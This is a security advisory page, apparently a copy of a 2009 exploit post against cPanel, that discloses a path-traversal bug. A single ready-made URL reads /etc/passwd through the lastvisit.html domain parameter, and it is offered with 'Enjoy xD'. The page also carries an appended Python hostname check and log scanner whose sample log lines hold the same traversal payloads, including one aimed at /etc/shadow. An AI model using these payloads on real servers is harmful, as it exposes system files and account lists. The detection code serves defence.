Cpanel (lastvisit.html domain) Arbitrary File Disclosure Vuln (auth)

2009-07-02 / 2009-07-03
Credit: SEC-R1Z
Risk: High
Local: No
Remote: Yes
CWE: CWE-98


CVSS Base Score: 5/10
Impact Subscore: 2.9/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: Not required
Confidentiality impact: Partial
Integrity impact: None
Availability impact: None

./SEC-R1Z 2009 - R.I.P MichaelJackson !!!!!

CPANEL USER BYPASS

Author.: Black Dream
Contact: Be5_at_HoTMail_dot_Fr
HoMe : www.sec-r1z.com
ARAB ETHICAL HACKING, PENETRATION TESTING & WEB APPLICATION SECURITY SYSTEM

Script.: CPANEL
Home...: http://CPANEL.NET

[+] Exploit:

http://r1z.com:2082/frontend/x3/stats/lastvisit.html?domain=../../../../../../../../etc/passwd

[+] Now you see all cpanel[s] user[s]

[+] Enjoy xD

Greetz.: ~ His0k4 ~ j0rd4n14n.r1z ~ SimO-s0fT ~ S4s-T3rr0rist ~ Golden-Z3r0
Linux-D3v1L And All #sec-r1z memb3rz!!!!
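Added defender-side example, not code from the advisory or from cPanel: a check that accepts only plain hostnames for the `domain` parameter, and a scan of access-log lines for lastvisit.html requests whose `domain` value is not a hostname (covering percent-encoded traversal as well as the literal `../` form above). The log lines, client addresses and the function names `is_safe_domain` / `find_traversal_attempts` are constructed assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote

# Hostname syntax: labels of letters/digits/hyphens, no leading/trailing hyphen,
# separated by single dots. Slashes, backslashes, ".." and NUL never match.
HOST_RE = re.compile(
    r"^(?=.{1,253}$)(?!-)[A-Za-z0-9-]{1,63}(?<!-)(\.(?!-)[A-Za-z0-9-]{1,63}(?<!-))*$"
)

def _decode(value: str) -> str:
    """Collapse single and double percent-encoding (e.g. %252e%252e -> ..)."""
    return unquote(unquote(value))

def is_safe_domain(value: str) -> bool:
    """True only if value is a plain hostname; any path-like content is rejected."""
    decoded = _decode(value)
    if "\x00" in decoded or "/" in decoded or "\\" in decoded or ".." in decoded:
        return False
    return HOST_RE.fullmatch(decoded) is not None

# Constructed sample access-log lines (hypothetical, not from the original page).
SAMPLE_LOG = """\
203.0.113.7 - - [02/Jul/2009:10:01:12 +0000] "GET /frontend/x3/stats/lastvisit.html?domain=example.com HTTP/1.1" 200 5123
203.0.113.9 - - [02/Jul/2009:10:02:41 +0000] "GET /frontend/x3/stats/lastvisit.html?domain=../../../../../../../../etc/passwd HTTP/1.1" 200 1874
203.0.113.9 - - [02/Jul/2009:10:03:05 +0000] "GET /frontend/x3/stats/lastvisit.html?domain=%2e%2e%2f%2e%2e%2fetc%2fshadow HTTP/1.1" 403 211
203.0.113.4 - - [02/Jul/2009:10:04:00 +0000] "GET /frontend/x3/index.html HTTP/1.1" 200 9001
"""

# Common-log-format fields we need: client IP, timestamp, request target, status.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) [^"]*" (\d{3})')

def find_traversal_attempts(log_text: str) -> list:
    """Return (client_ip, status, decoded_domain) for every lastvisit.html request
    whose domain parameter fails the hostname check."""
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, _ts, target, status = m.groups()
        url = urlsplit(target)
        if not url.path.endswith("/stats/lastvisit.html"):
            continue
        for value in parse_qs(url.query).get("domain", []):  # parse_qs decodes once
            if not is_safe_domain(value):
                hits.append((ip, int(status), _decode(value)))
    return hits

if __name__ == "__main__":
    for ip, status, dom in find_traversal_attempts(SAMPLE_LOG):
        print(f"{ip} status={status} domain={dom!r}")
```

A 200 status on a flagged request is the case to triage first, since it indicates the file read likely succeeded.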


Copyright 2024, cxsecurity.com